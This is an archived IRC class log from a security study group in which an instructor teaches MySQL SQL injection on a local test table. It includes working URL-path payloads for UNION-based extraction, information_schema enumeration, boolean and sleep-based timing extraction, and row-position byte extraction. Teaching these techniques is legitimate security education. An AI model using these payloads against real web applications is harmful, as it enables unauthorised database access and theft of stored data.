Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "Classes/Logs/2012/September/25/00-02"
From NetSec
Chantal21I (Talk | contribs) (Created page with "<pre> <hatter> k guys take five minutes before class starts to do whatever you do <hatter> Today we're gonna cover mysql pretty exclusively <hatter> Everyone ready? <Spunker> rea...") |
(No difference)
|
Revision as of 05:59, 25 September 2012
<hatter> k guys take five minutes before class starts to do whatever you do <hatter> Today we're gonna cover mysql pretty exclusively <hatter> Everyone ready? <Spunker> ready <hatter> Ok so <hatter> One thing you should do is install mysql through whatever package manager you have locally (assuming you have a linux system) <hatter> You will need this in order to follow along. If anyone using a binary installation wants to take a moment or two to install, say so and I will wait. <hatter> Moving forward, lets create a test database : <hatter> mysql> create database query_testing; <hatter> Query OK, 1 row affected (0.00 sec) <hatter> And then use it: <hatter> mysql> use query_testing; <hatter> Database changed <hatter> Now, we'll make a small table called "category" for our testing purposes. <hatter> mysql> create table category (id int auto_increment primary key, caption varchar(32)); <hatter> Query OK, 0 rows affected (0.15 sec) <hatter> And insert some sample data: <hatter> mysql> insert into category values(null,'Sql Injection'); <hatter> Query OK, 1 row affected (0.05 sec) <hatter> mysql> insert into category values(null,'Web Exploitation'); <hatter> Query OK, 1 row affected (0.05 sec) <hatter> If you want to make sure the data went in, just go ahead and select * from category: <hatter> mysql> select * from category; <hatter> +----+------------------+ <hatter> | id | caption | <hatter> +----+------------------+ <hatter> | 1 | Sql Injection | <hatter> | 2 | Web Exploitation | <hatter> +----+------------------+ <hatter> 2 rows in set (0.00 sec) <fxm> \G for vertical display as opposed to ; btw <hatter> Suppose we have the url: <hatter> /category/1 <hatter> and its page title is Sql Injection <hatter> That SQL query may look something like: <hatter> mysql> select caption from category where id=1; <hatter> +---------------+ <hatter> | caption | <hatter> +---------------+ <hatter> | Sql Injection | <hatter> +---------------+ <hatter> 1 row in set (0.00 sec) <hatter> In this particular instance, mod_rewrite or another system is in place serializing the values <hatter> this means we can't use the '/' character in our injections, not that we'd normally need to. <hatter> so this really looks more like <hatter> select caption from category where id= $id <hatter> when we test this for injection, <hatter> we may use the url: <hatter> /category/1 and 2 between 0 and 4 <hatter> which would translate to the following SQL query: <hatter> mysql> select caption from category where id=1 and 2 between 0 and 4; <hatter> +---------------+ <hatter> | caption | <hatter> +---------------+ <hatter> | Sql Injection | <hatter> +---------------+ <hatter> 1 row in set (0.00 sec) <hatter> We would use the following "false" statement to verify: <hatter> /category/1/ and 5 between 0 and 4 <hatter> /category/1 and 5 between 0 and 4 <hatter> rather <hatter> without that last / <hatter> mysql> select caption from category where id=1 and 5 between 0 and 4; <hatter> Empty set (0.00 sec) <hatter> So now "Sql Injection" would be missing from the page title. <hatter> Now, getting into exploitation, we only have 1 column here and this is not a nested statement,. <hatter> This means that we can exploit this very easily: <hatter> mysql> select caption from category where id=1 and 5 between 0 and 4 union select version(); <hatter> +-------------------------+ <hatter> | caption | <hatter> +-------------------------+ <hatter> | 5.5.24-0ubuntu0.12.04.1 | <hatter> My ubuntu vm <hatter> +-------------------------+ <hatter> 1 row in set (0.01 sec) <hatter> So <hatter> would display that on the page <hatter> title <hatter> when you visted the url: <hatter> /category/1 and 5 between 0 and 4 union select version() <hatter> Before we get any more advanced, are there any questions? <Spunker> could we have done this by using 1=2 for example <Spunker> instead of 5 between 0 and 4 <hatter> sure. you'd have to do /category/1 and 1=2 union select version() <hatter> you could also do this by supplying an invalid id <hatter> e.g. <fxm> rewrites with /(\d+)/ this would not work on assuming \1|$1 is getting passed as an arg to a script doing the category translation ? <hatter> sure. you'd have to do /category/-1 union select version() <hatter> fxm: correct * Who_is_Gh0st has quit (Broken pipe) <hatter> but in some cases <hatter> you get idiots using \w\d etc <hatter> and sometimes its not rewrites <fxm> lol. <hatter> sometimes its not even apache or nginx <hatter> its some internal bs <hatter> so anyway <fxm> BadBlue yo <hatter> Moving forward, the things you want to do during information gathering are obtain the following: <hatter> user() <hatter> database() <hatter> version() <hatter> this is normally enough to proceed with the rest <hatter> Before we proceed, lets review concat() and group_concat(). <hatter> concat() merges two columns into a single cell from the same record: <hatter> mysql> select concat(id,caption) from category limit 1; <hatter> +--------------------+ <hatter> | concat(id,caption) | <hatter> +--------------------+ <hatter> | 1Sql Injection | <hatter> +--------------------+ <hatter> 1 row in set (0.00 sec) <hatter> while group_concat() merges multiple records into a single cell: <hatter> mysql> select group_concat(id,caption) from category; <hatter> +----------------------------------+ <hatter> | group_concat(id,caption) | <hatter> +----------------------------------+ <hatter> | 1Sql Injection,2Web Exploitation | <hatter> +----------------------------------+ <hatter> 1 row in set (0.00 sec) <hatter> suppose we wanted to obtain a list of all table names and column names in the current database in readable format. <hatter> usually we'd use "show" and "explain" or "desc", however, in this case we will use the information_schema.columns table. <hatter> mysql> select group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database(); <hatter> +-------------------------------------------+ <hatter> | group_concat(table_name,0x2e,column_name) | <hatter> +-------------------------------------------+ <hatter> | category.id,category.caption | <hatter> +-------------------------------------------+ <hatter> when we used our injection, it would look something like: <hatter> 1 row in set (0.01 sec) <hatter> mysql> select caption from category where id=1 and 5 between 0 and 4 union select group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database(); <hatter> +------------------------------+ <hatter> | caption | <hatter> +------------------------------+ <hatter> | category.id,category.caption | <hatter> +------------------------------+ <hatter> 1 row in set (0.00 sec) <hatter> while the url would be <hatter> /category/1 and 5 between 0 and 4 union select group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database(); <hatter> if you wanted to get <hatter> data types with this <hatter> you could do something like: <hatter> mysql> select group_concat(table_name,0x2e,column_name,0x3a,data_type) from information_schema.columns where table_schema=database();+----------------------------------------------------------+ <hatter> | group_concat(table_name,0x2e,column_name,0x3a,data_type) | <hatter> +----------------------------------------------------------+ <hatter> | category.id:int,category.caption:varchar | <hatter> +----------------------------------------------------------+ <hatter> 1 row in set (0.00 sec) <hatter> this is the easy level exploitation. are there any questions? <hatter> Ok, moving on <hatter> back to true and false <hatter> does anyone here *not* know boolean enumeration? if so, we can cover the basics and migrate to more advanced topics and forms, if not we can skip and move ahead. <hatter> so everyone understands this: <hatter> mysql> select caption from category where id=1 and ascii(substring((select group_concat(table_name,0x2e,column_name,0x3a,data_type) from information_schema.columns where table_schema=database()) from 1 for 1)) between 32 and 64; <hatter> Empty set (0.01 sec) <hatter> ? <hatter> Okay, If so, we'll take a 15 minute break and come back with timing attacks and single byte extraction * codejury ([email protected]) has joined #CSIII <hatter> ok lets come back with some single byte extraction. <hatter> This is different than boolean enumeration because you get back the value of one byte. <hatter> it can also be used from a partially blind and in some cases full-blind scenario. <hatter> THe last query we went over was <hatter> select group_concat(table_name,0x2e,column_name,0x3a,data_type) from information_schema.columns where table_schema=database() <hatter> To select the first byte, we'll use <hatter> select ascii(substring(select group_concat(table_name,0x2e,column_name,0x3a,data_type) from information_schema.columns where table_schema=database()) from 1 for 1)) <hatter> mysql> select ascii(substring((select group_concat(table_name,0x2e,column_name,0x3a,data_type) from information_schema.columns where table_schema=database()) from 1 for 1)) as substr; <hatter> +--------+ <hatter> | substr | <hatter> +--------+ <hatter> in this instance we get back the value '99' <hatter> | 99 | <hatter> +--------+ <hatter> 1 row in set (0.00 sec) <hatter> When we sleep for this length of time: <hatter> mysql> select caption from category where id=1 and sleep(ascii(substring((select group_concat(table_name,0x2e,column_name,0x3a,data_type) from information_schema.columns where table_schema=database()) from 1 for 1))) is null; <hatter> Empty set (1 min 39.01 sec) <hatter> 1 minute and 39 sections = 99 <hatter> obviously this won't work in situations which have exceedingly variable latency <hatter> There are certain ways that you can utilize this technique in certain circumstances <hatter> lets look at this: <hatter> mysql> select 1 union select 2 union select 3; <hatter> +---+ <hatter> | 1 | <hatter> +---+ <hatter> | 1 | <hatter> | 2 | <hatter> | 3 | <hatter> +---+ <hatter> 3 rows in set (0.00 sec) <hatter> mysql> select 1,2,3; <hatter> +---+---+---+ <hatter> | 1 | 2 | 3 | <hatter> +---+---+---+ <hatter> | 1 | 2 | 3 | <hatter> +---+---+---+ <hatter> 1 row in set (0.00 sec) <hatter> now <hatter> say we had everything up to 255. this could be in data, or may not be in data. <hatter> I'm just going to go ahead for point of argument: <hatter> mysql> select 99,100,101; <hatter> +----+-----+-----+ <hatter> | 99 | 100 | 101 | <hatter> +----+-----+-----+ <hatter> so <hatter> mysql> select position((ascii(substring((select group_concat(table_name,0x2e,column_name,0x3a,data_type) from information_schema.columns where table_schema=database()) from 1 for 1))) IN (select group_concat(99,100,101))) as pos; <hatter> +------+ <hatter> | pos | <hatter> +------+ <hatter> | 1 | <hatter> +------+ <hatter> position() and substring() are particularly useful when used in conjunction with one another. <hatter> you can use these further if you identify a table with 255 rows. <hatter> brb for 1s and then I'll explain * tytaN has quit (client exited: Lost terminal) <hatter> just to prove our concept <hatter> I'm going to delete a row then add one <hatter> mysql> insert into category values(null,'exploitation'); <hatter> Query OK, 1 row affected (0.05 sec) <hatter> mysql> select id,@r:=@r+1 as pos from category c join (select @r:=0) r; <hatter> +----+------+ <hatter> | id | pos | <hatter> +----+------+ <hatter> | 1 | 1 | <hatter> | 3 | 2 | <hatter> +----+------+ <hatter> 2 rows in set (0.00 sec) <hatter> mysql> select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r) x where pos=2; <hatter> +----+ <hatter> | id | <hatter> +----+ <hatter> | 3 | <hatter> +----+ <hatter> 1 row in set (0.00 sec) <hatter> so, you'd get a list of id's <hatter> using boolean enumeration first, or maybe they are just in the url <hatter> you need the first 255 of them <hatter> many cases will only require the first 127 <hatter> mysql> select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r limit 255) x where pos=2; <hatter> +----+ <hatter> | id | <hatter> +----+ <hatter> | 3 | <hatter> +----+ <hatter> 1 row in set (0.00 sec) <hatter> now say my position <hatter> once our id's and the content displayed on those pages <hatter> is known <hatter> becomes an ascii() <hatter> e.g. <hatter> mysql> select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r limit 255) x where pos=ascii(substring((select "123") from 1 for 1)); <hatter> Empty set (0.00 sec) <hatter> in this case it doesn't work <hatter> because it would need 49 rowzs <hatter> however if we go ahead and insert them <hatter> (1s) <hatter> mysql> select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r limit 255) x where pos=ascii(substring((select "123") from 1 for 1)); <hatter> +----+ <hatter> | id | <hatter> +----+ <hatter> | 50 | <hatter> notice the id is 50 here and not 49 - <hatter> +----+ <hatter> 1 row in set (0.01 sec) <hatter> though it is the 49th row. <hatter> however <hatter> say we go to <hatter> /category/(select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r limit 255) x where pos=ascii(substring((select "123") from 1 for 1))) * lejill ([email protected]) has joined #CSIII <hatter> mysql> select caption from category where id=(select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r limit 255) x where pos=ascii(substring((select "123") from 1 for 1))); <hatter> +--------------+ <hatter> | caption | <hatter> +--------------+ <hatter> | exploitation | <hatter> +--------------+ <hatter> 1 row in set (0.00 sec) * Abnormality ([email protected]) has joined #CSIII <hatter> now we'd know that the ascii code was 49 because"exploitation" is the caption for id 50, the 49th record in the table. <hatter> mysql> select ascii(substring((select "123") from 1 for 1)); <hatter> +-----------------------------------------------+ <hatter> | ascii(substring((select "123") from 1 for 1)) | <hatter> +-----------------------------------------------+ <hatter> | 49 | <hatter> +-----------------------------------------------+ <hatter> 1 row in set (0.00 sec) * Abnormality ([email protected]) has left #CSIII * lejill ([email protected]) has left #CSIII <hatter> in that example instance, we are going after the value of 123, but this can be replaced arbitrarily; * lejill ([email protected]) has joined #CSIII * lejill ([email protected]) has left #CSIII * Abnormality ([email protected]) has joined #CSIII <hatter> Your final queries may look something like: <hatter> select caption from category where id=(select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r limit 255) x where pos=ascii(substring((select group_concat(table_name,0x2e,column_name) from information_schema.columns where table_schema=database()) from 1 for 1))); * Dwaan has quit (client exited: h) <hatter> Are there any questions so far? <hatter> This is advanced stuff, giuys <fxm> i'm afraid to ask to go to the bathroom <fxm> tbh <hatter> lol * Abnormality ([email protected]) has left #CSIII <hatter> I'll give another 5 min break <hatter> When you are in data discovery phase, you'd do something like: <hatter> (select id from (select id,@r:=@r+1 as pos from category c join (select @r:=0) r limit 255) x where pos=$counter) <hatter> for $counter = 0...2555 <hatter> er <hatter> 2555 <hatter> 255 <hatter> sticky 5 key <hatter> apparently <hatter> ok - if there are no questions, someone get me logs please